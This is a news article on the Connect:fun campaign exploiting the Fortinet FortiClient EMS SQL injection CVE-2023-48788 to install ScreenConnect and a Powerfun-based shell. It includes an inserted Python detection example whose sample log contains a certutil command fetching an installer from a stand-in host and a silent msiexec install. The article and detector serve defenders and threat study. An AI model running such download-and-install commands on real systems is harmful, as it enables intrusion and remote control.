15 April 2024

Connect:fun campaign targets Fortinet bug to deploy malware and RMTs

Security researchers have spotted an exploitation campaign that targets organizations by exploiting an SQL injection vulnerability in Fortinet's FortiClient Enterprise Management Server (EMS) software.

Tracked as CVE-2023-48788, the issue was brought to public attention on March 12, 2024. Subsequently, on March 21, researchers released a proof of concept (PoC) exploit for this vulnerability. Since then, reports have surfaced of active exploits in the wild, prompting the US Cybersecurity and Infrastructure Security Agency (CISA) to include CVE-2023-48788 in its list of Known Exploited Vulnerabilities (KEV) on March 25.

Dubbed "Connect:fun" by Forescout Research’s Vedere Labs, the campaign has been attributed to a threat actor believed to be in operation since at least 2022. Evidence suggests that the threat actor targets Fortinet appliances and employs a combination of Vietnamese and German languages within their infrastructure.

“Initially perceived as a security team or research team in Vietnam based on the Github repository, they are actively exploiting and installing tools post-exploitation on real targets instead of only researching,” the threat analysis team said.

The observed attack targeted an unnamed media company in March 2024, the researchers said.

On March 21, server logs revealed the threat actor's attempts to exploit CVE-2023-48788, aiming for command execution by manipulating SQL Server configurations.

By exploiting the SQL injection flaw, the actor deployed the ScreenConnect remote management tool and a customized script based on Powerfun, an open-source utility whose capabilities include bind and reverse shells as well as arbitrary command execution.

The attackers then used certutil.exe to download ScreenConnect from the domain ursketz[.]com, followed by installation via msiexec.exe. The researchers said they weren’t able to retrieve the ScreenConnect logs to identify the actor’s further actions.
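The chain described above (SQL Server spawning a shell after the injection, certutil.exe fetching a file, msiexec.exe installing it shortly after on the same host) is visible in ordinary process-creation telemetry. The following detector is an added example, not code from the article or from Forescout; the pipe-delimited log format, host names, file paths and the `dl.example.invalid` download host are constructed for the sample and are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events for this example (not from the article or
# from Forescout's report). Assumed format per line:
#   <ISO timestamp>|<host>|<parent image>|<image>|<command line>
SAMPLE_LOG = """\
2024-03-21T10:00:00Z|ems01|C:\\...\\Binn\\sqlservr.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami
2024-03-21T10:00:42Z|ems01|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -urlcache -f http://dl.example.invalid/sc.msi C:\\Windows\\Temp\\sc.msi
2024-03-21T10:01:10Z|ems01|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\msiexec.exe|msiexec.exe /i C:\\Windows\\Temp\\sc.msi /quiet
2024-03-21T11:30:00Z|ws07|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\msiexec.exe|msiexec.exe /i C:\\Users\\alice\\Downloads\\tool.msi
"""

CHAIN_WINDOW = timedelta(minutes=15)  # max gap between certutil download and msiexec install

def parse_events(log_text):
    """Split each line into a dict; image names are lower-cased basenames."""
    events = []
    for line in filter(None, log_text.splitlines()):
        ts, host, parent, image, cmd = line.split("|", 4)
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "host": host,
                       "parent": parent.rsplit("\\", 1)[-1].lower(),
                       "image": image.rsplit("\\", 1)[-1].lower(), "cmd": cmd})
    return sorted(events, key=lambda e: e["ts"])

def detect(events):
    """Return (rule, host, timestamp) findings for the three steps seen in the campaign."""
    findings, downloads = [], {}  # downloads: host -> (ts, local path certutil wrote)
    for e in events:
        # Step 1: SQL Server spawning a shell is how the SQL injection became command execution
        if e["parent"] == "sqlservr.exe" and e["image"] in ("cmd.exe", "powershell.exe"):
            findings.append(("sqlserver_spawns_shell", e["host"], e["ts"]))
        # Step 2: certutil fetching a remote URL and writing it to a local path
        if e["image"] == "certutil.exe":
            m = re.search(r"https?://\S+\s+(\S+)", e["cmd"], re.I)
            if m:
                findings.append(("certutil_download", e["host"], e["ts"]))
                downloads[e["host"]] = (e["ts"], m.group(1).lower())
        # Step 3: msiexec installing the file certutil just fetched, on the same host
        if e["image"] == "msiexec.exe" and e["host"] in downloads:
            dl_ts, path = downloads[e["host"]]
            if e["ts"] - dl_ts <= CHAIN_WINDOW and path in e["cmd"].lower():
                findings.append(("certutil_then_msiexec", e["host"], e["ts"]))
    return findings

def run_sample():
    return detect(parse_events(SAMPLE_LOG))
```

The unrelated msiexec run on `ws07` produces no finding, because it has no preceding certutil download on that host; only the correlated sequence on `ems01` is reported.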

“This is evidence the activity is part of a specific campaign rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances,” Forescout noted.
